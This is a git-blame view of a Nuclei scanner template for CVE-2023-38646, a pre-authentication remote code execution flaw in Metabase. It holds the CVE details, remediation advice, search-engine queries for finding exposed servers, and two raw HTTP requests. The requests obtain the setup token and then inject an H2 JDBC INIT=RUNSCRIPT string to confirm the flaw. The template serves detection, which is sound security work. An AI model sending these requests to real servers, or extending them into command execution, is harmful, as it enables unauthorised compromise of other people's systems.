daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2023/CVE-2023-38646.yaml

74 lines
2.6 KiB
YAML
Raw Normal View History

Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update
2023-07-28 19:49:14 +00:00
id: CVE-2023-38646
info:
name: Metabase < 0.46.6.1 - Remote Code Execution
author: rootxharsh,iamnoooob,pdresearch
severity: critical
description: |
Metabase open source before 0.46.6.1 and Metabase Enterprise before 1.46.6.1 allow attackers to execute arbitrary commands on the server, at the server's privilege level. Authentication is not required for exploitation. The other fixed versions are 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2, and 1.43.7.2.
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
remediation: |
Upgrade Metabase to version 0.46.6.1 or later to mitigate this vulnerability.
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update
2023-07-28 19:49:14 +00:00
reference:
- https://www.metabase.com/blog/security-advisory
- https://github.com/metabase/metabase/releases/tag/v0.46.6.1
- https://mp.weixin.qq.com/s/ATFwFl-D8k9QfQfzKjZFDg
- https://news.ycombinator.com/item?id=36812256
- https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/
- https://gist.github.com/testanull/a7beb2777bbf550f3cf533d2794477fe
classification:
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update
2023-07-28 19:49:14 +00:00
cve-id: CVE-2023-38646
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot:
2023-11-05 22:23:39 +00:00
epss-score: 0.60445
TemplateMan Update [Thu Nov 23 06:31:40 UTC 2023] :robot:
2023-11-23 06:31:41 +00:00
epss-percentile: 0.97465
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:metabase:metabase:*:*:*:*:-:*:*:*
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update
2023-07-28 19:49:14 +00:00
metadata:
verified: true
max-request: 2
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
vendor: metabase
product: metabase
updated remediation in 2023 CVEs
2023-09-06 11:43:37 +00:00
shodan-query: http.title:"Metabase"
fofa-query: app="Metabase"
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update
2023-07-28 19:49:14 +00:00
tags: cve,cve2023,metabase,oss,rce
variables:
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
file: "./plugins/vertica.metabase-driver.jar"
Added CVE-2023-38646 (Metabase PreAuth RCE) (#7777) * Added detection template for CVE-2023-38646 * payload update
2023-07-28 19:49:14 +00:00
http:
- raw:
- |
GET /api/session/properties HTTP/1.1
Host: {{Hostname}}
- |
POST /api/setup/validate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"token":"{{token}}",
"details":{
"details":{
"subprotocol":"h2",
"classname":"org.h2.Driver",
"advanced-options":true,
"subname":"mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM '{{file}}'//\\;"
},
"name":"{{randstr}}",
"engine":"postgres"
}
}
extractors:
- type: json
part: body_1
name: token
json:
- .["setup-token"]
internal: true
matchers:
- type: dsl
dsl:
- contains_any(body_2, "Syntax error in SQL statement","NoSuchFileException")
- status_code_2 == 400
Added EPSS Percentile
2023-08-31 11:46:18 +00:00
condition: and
TemplateMan Update [Thu Nov 23 07:42:51 UTC 2023] :robot:
2023-11-23 07:42:52 +00:00
tags enhancements
2023-12-05 09:50:33 +00:00
# digest: 4b0a00483046022100d3c015a05cc1897e27b7d5dd66285a753ca2f7037bc7fe0789d0fefdc73d0f43022100db622f310de38ba37b19ac0f6314a47c21af5eb67e6eb871ed9fe24ff6df5a69:922c64590222798bb761d5b6d8e72950